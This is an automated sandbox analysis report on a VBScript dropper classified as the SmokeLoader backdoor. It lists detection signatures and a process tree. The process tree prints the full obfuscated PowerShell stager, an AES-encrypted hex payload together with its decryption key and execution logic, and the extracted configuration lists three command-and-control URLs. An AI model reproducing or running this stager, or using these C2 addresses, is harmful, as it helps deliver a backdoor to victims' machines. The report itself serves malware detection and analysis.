Edit tour
Windows
Analysis Report
#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
Overview
General Information
| Sample name: | #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsrenamed because original name is a hash value |
| Original sample name: | -i .vbs |
| Analysis ID: | 1577216 |
| MD5: | e6cba366210db05b0c86115900a17133 |
| SHA1: | f3cc53aa5b7a037a8027d8d1703ab5c367687237 |
| SHA256: | dada50182ca98f75e0055f9b4a47d8ef3a6dda5c126cac309467c02257f3c1c0 |
| Infos: |   |
 | |
Detection
SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2680 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\#U042 1#U043a#U0 430#U043d- #U043a#U04 3e#U043fi# U044f #U04 1f#U0430#U 0441#U043f #U043e#U04 40#U0442.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6640 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction wfMp F($MmiD){r eturn -spl it ($MmiD -replace ' ..', '0x$& ')};$Ralm a = wfMpF( '6DDD913A2 04EDA9B48C F5583720FA 53B3C5CDEE 6E974B7BF1 73341D6688 0A83528E76 A5A809EDA4 7D2C263E95 E00A51AE2A 33D069542C CAE0C0FEF7 61523C7AFE 37B64185C6 53B4C4BF39 E67E1D89CD 6636984FC6 46C493C762 94187D1B2B 75D79DBAAB 680164B0C9 4848AA09BF 281C313B7C 3C25321608 23EFECF40A F7A9240375 A29DD3D82C 002B294865 66C166F6F0 4711F20F7F 5B2B6CDC61 AA7908A19F E7DE868861 41F7A34043 3F1A7D86ED 97FA28C2AC 93960B8141 56D48D922F 4B029C0720 6C1AEF6B44 FF7AF13392 1B3DB8F2FF 073F4CFFA8 62EDB9214C E28C296D8F B5162D5AB6 9B39935125 AB3242B742 A33D414114 7FCF532EEB 49A69FEA32 1ACE3E5BFF DC1520FB98 A143BBAFD2 2BB525550D 37D463F288 C61A14B125 8687EB239E 9A260D0E16 0D9614F099 67FE97F9B2 CE6BE1C240 11E78CAAB1 6CEEA43456 78EAB2756D 340EA7C849 F355578CB5 19AA0DE862 5F493EADBD 13583073BE 0D247EBD15 CD925FE851 855979D186 51080CF3BD 6FB803715B 373C134F7D 1EA1E3FAB7 E02D0D4AD6 FC40EAD36C 911A1AE73D 421AC10EFE 01473747C3 B4FC05FD6D 4D08C3521D B6BA6E9EEF 6CB8B1C7FC 76884C910C 22860E3575 831C23A886 93A6D7FE1F 158E001ED7 5B4588C08E D639A5B3F2 23E76CF1C1 7495201F16 D4149F714C A4BD42D2D5 E17399CF5E 4FCAE83C94 E9DBA2089F 3C430CE258 5999674221 CE62E61DCB 128072E936 B5DFED4CEB EEBA9232E5 82C33488E0 26E0F51232 11B5E9B12B 46C0CA95D1 F9A903B6B2 310CB4E108 C5C9B8328E 9021E1B76E AE56EF681B BC20E3C74B CCAA8E25DE CF9C13896D 1252B4B86B 2315F62ECC 43FDD7F9D4 46C70E046C 7872722C69 950AC7A265 63C81C0A52 F3B0F0D43D 41FE0060D3 4820472AE9 A9818D2FD3 B117A4B008 4EAA21D166 6A9297DCAE ACADD63462 FBB1E22C56 869537CA0C 0E1CD52EAB FF12858BC9 B1DDDC8CB4 C70E9FA254 9B5144F447 D1DEFC94F5 830D9CAC04 660B19C385 EC1A3D989A C7BAD8C3E7 E908C697C4 DA249D1564 75901B73F3 C800C602E5 86AA6998C1 7EB947E3D2 E8A13E7292 546210AF7E B29B003DA7 407AF81F5B 7811619B41 4E06D1D724 EF79FE9605 09F6D85F4B 55A5B6A365 F6EE49825F 0B19433EA2 C64737468F 1FAA1DDA90 E230F23CB6 7510524597 89FAC25AB2 7097516E25 1B4C56D5B1 497389F33F 64F9C729FA DB9F635E67 71D884FFAD 2363C3D29D 4981204263 6E0B8AAEE3 0');$idRJO =-join [ch ar[]](([Se curity.Cry ptography. Aes]::Crea te()).Crea teDecrypto r((wfMpF(' 4F6C6D774C 5361495051 654D725862 4F')),[byt e[]]::new( 16)).Trans formFinalB lock($Ralm a,0,$Ralma .Length)); & $idRJO. Substring( 0,3) $idRJ O.Substrin g(3) MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 1672 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
Acrobat.exe (PID: 3872 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\R oaming\inv oce2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 6716 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 3620 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 68 --field -trial-han dle=1768,i ,417881461 9704218738 ,125666422 1992552057 8,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) 
putty.exe (PID: 4796 cmdline: "C:\Users\ user\AppDa ta\Roaming \putty.exe " MD5: C09AA26230A2083DA9032866FD33703D) 
explorer.exe (PID: 1028 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
svchost.exe (PID: 6768 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- ddhfdfu (PID: 7976 cmdline:
C:\Users\u ser\AppDat a\Roaming\ ddhfdfu MD5: C09AA26230A2083DA9032866FD33703D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 10 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 1 entries | ||||
System Summary |   |
|---|
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113: | ||